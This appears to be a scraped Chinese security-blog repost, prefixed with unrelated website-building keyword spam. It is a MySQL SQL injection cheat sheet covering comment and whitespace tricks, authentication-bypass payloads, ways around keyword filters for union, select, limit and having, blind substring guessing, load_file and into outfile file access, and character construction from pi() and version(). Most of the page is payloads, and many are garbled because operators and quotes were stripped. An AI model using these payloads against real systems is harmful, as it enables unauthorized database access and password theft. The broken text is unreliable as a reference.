网站制作的注意事项,国内网站必须备案吗,网站开发工程师社交,衡水哪个公司做网站好0x00 介绍以下所有技巧都只在mysql适用#xff0c;因为它太灵活了。0x01 MYSQl灵活的语法1 MySQL语法以及认证绕过注释符#xff1a;##xff0c;-- X(X为任意字符)/*(MySQL-5.1);%00or 11;%00or 11 union select 1,2or 11 #/*!50000or*/ 11 -- - //版本号为5.1.38时只要小于…0x00 介绍以下所有技巧都只在mysql适用因为它太灵活了。0x01 MYSQl灵活的语法1 MySQL语法以及认证绕过注释符#-- X(X为任意字符)/*(MySQL-5.1);%00or 11;%00or 11 union select 1,2or 11 #/*!50000or*/ 11 -- - //版本号为5.1.38时只要小于50138/*!or*/ 11 -- -前缀任意混合 - ~ !or --2- -!!!2测试后发现and/or后面可以跟上偶数个!、~可以替代空格也可以混合使用(混合后规律又不同)and/or前的空格可以省略or- -!!!11运算符^, , !, %, /, *, , , |, ||, , , , , , , XOR,DIV, SOUNDS LIKE, RLIKE, REGEXP, IS, NOT, BETWEEN,……or 1 rlike 1空格替换%20, %09, %0a, %0b, %0c, %0d, %a0也可以插入括号前缀操作符引号or(1)sounds/**/like1--%a0-字符串格式 or aa or ana //unicode or ab1100001 //binary or a_binary1100001 //5.5.41下测试无效 or ax61 //16进制2、MySQL常用的一些小工具常量true false null \N, current_timestamp....变量myvar:1系统变量version, datadir....常用函数version(), pi(), pow(), char(), substring()....3、MySQL类型转换 or 1true #true1, false0 or 1 #true or version()5.5 #5.5.41-log or round(pi(),1)truetrue0.4version() #3.1110.4select * from users where abcselect * from users where (ab)cselect * from users where (false)cselect * from users where (0)cselect * from users where (0)0select * from users where trueselect * from users以上的语句都是同样的效果4、认证绕过绕过语句select data from users where nameselect data from users where flaseselect data from users where 00绕过语句-select data from users where name-select data from users where name0-0select data from users where 000x02 关键字过滤空格过滤代码/\s/%20, %09, %0a, %0b, %0c, %0d, %a0关键字ORAND过滤代码/\sor\s/i,/\sand\s/i||11 #or11 #and关键字union select过滤代码/union\sselect/iand(true)like(false)union(select(pass)from(users))#union [all|distinct] select pass from users#union%a0select pass from users#union/*!select*/pass from users#/vuln.php?id1 union/*sort*/select pass from users-- -如果单独过滤union,使用盲注来获取数据and(select pass from users limit 1)secret通过子查询获取单值来进行比较关键字limit过滤代码/limit/iand(select pass from users where id1)aand(select pass from users group by id having id1)aand length((select pass from users having substr(pass,1,1)a))关键字having过滤代码/having/iand(select substr(group_concat(pass),1,1)from users)关键字select ... from过滤代码/SELECT\s[A-Za-z.]\sFROM/i/iselect [all|distinct] pass from usersselecttable_namefrominformation_schema . tablesselect pass as alias from usersselect pass aliasalias from usersselect passalias aliasfrom usersselectpass%a0from(users)关键字select过滤代码/select/i1 有文件读取权限 and substr(load_file(file),locate(DocumentRoot,(load_file(file)))length(DocumentRoot),10)a into outfile /var/www/dump.txt2 获取列名 and 列名 is not null# procedure analyse()#使用substr来做过滤条件and substr(pass,1,1)a关键字select,and,0#select data from users where name -0 # int typecastselect data from users where name 0 # int typecastselect data from users where 0 0 # true-1#select data from users where 0 -1 # false使用条件判断来进行true、false的选择ifnull(nullif()), case when if()-if(nameAdmin,1,0)#使用嵌套条件-if(if(nameAdmin,1,0), // conditionif(substr(pass,1,1)a,1,0) // if true,0)# // if false0x03 函数过滤构建字符串相关函数unhex char hex ascii ord substr substring mid pad left right insert and substr(data,1,1) a# and substr(data,1,1) 0x61# 0x6162 and substr(data,1,1) unhex(61)# unhex(6162) and substr(data,1,1) char(97)# char(97,98) and hex(substr(data,1,1)) 61# and ascii(substr(data,1,1)) 97# and ord(substr(data,1,1)) 97#使用conv来进行进制的转换 and substr(data,1,1) lower(conv(10,10,36))# a and substr(data,1,1) lower(conv(11,10,36))# b and substr(data,1,1) lower(conv(36,10,36))# z使用函数来猜解数据 and substr(data,1,1) a# and substring(data,1,1) a# and mid(data,1,1) a#不适用逗号来获取 and substr(data from 1 for 1) a#同样也可以使用一下比较少见的函数来尝试绕过lpad(data,1,space(1)) // lpad(hi,4,?) ??hirpad(data,1,space(1)) // rpad(hi,4,?) hi??left(data,1)reverse(right(reverse(data),1))insert(insert(version(),1,0,space(0)),2,222,space(0))有些函数有类似搜索匹配的功能-if(locate(f,data),1,0)#-if(locate(fo,data),1,0)#-if(locate(foo,data),1,0)#instr(), position()使用函数进行字符串的切割length(trim(leading a FROM data)) # length will be shorterlength(replace(data, a, )) # length will be shorter2种方式都是相同效果0x04 注入时主要使用的一些东西1个控制流程操作(select, case, if(), ...)1个比较操作(, like, mod(), ...)1个字符串的猜解(mid(), left(), rpad(), …)1个字符串生成(0x61, hex(), conv())使用conv([10-36],10,36)可以实现所有字符的表示false !pi() 0 ceil(pi()*pi()) 10 A ceil((pi()pi())*pi()) 20 Ktrue !!pi() 1 ceil(pi()*pi())true 11 B ceil(ceil(pi())*version()) 21 Ltruetrue 2 ceil(pi()pi()version()) 12 C ceil(pi()*ceil(pi()pi())) 22 Mfloor(pi()) 3 floor(pi()*pi()pi()) 13 D ceil((pi()ceil(pi()))*pi()) 23 Nceil(pi()) 4 ceil(pi()*pi()pi()) 14 E ceil(pi())*ceil(version()) 24 Ofloor(version()) 5 ceil(pi()*pi()version()) 15 F floor(pi()*(version()pi())) 25 Pceil(version()) 6 floor(pi()*version()) 16 G floor(version()*version()) 26 Qceil(pi()pi()) 7 ceil(pi()*version()) 17 H ceil(version()*version()) 27 Rfloor(version()pi()) 8 ceil(pi()*version())true 18 I ceil(pi()*pi()*pi()-pi()) 28 Sfloor(pi()*pi()) 9 floor((pi()pi())*pi()) 19 J floor(pi()*pi()*floor(pi())) 29 T更多详细的东西可以参考原文还有一些其他的注入资料可以参考http://websec.ca/kb/sql_injection往期精彩感兴趣的可以点个关注 关注「安全先师」把握前沿安全脉搏
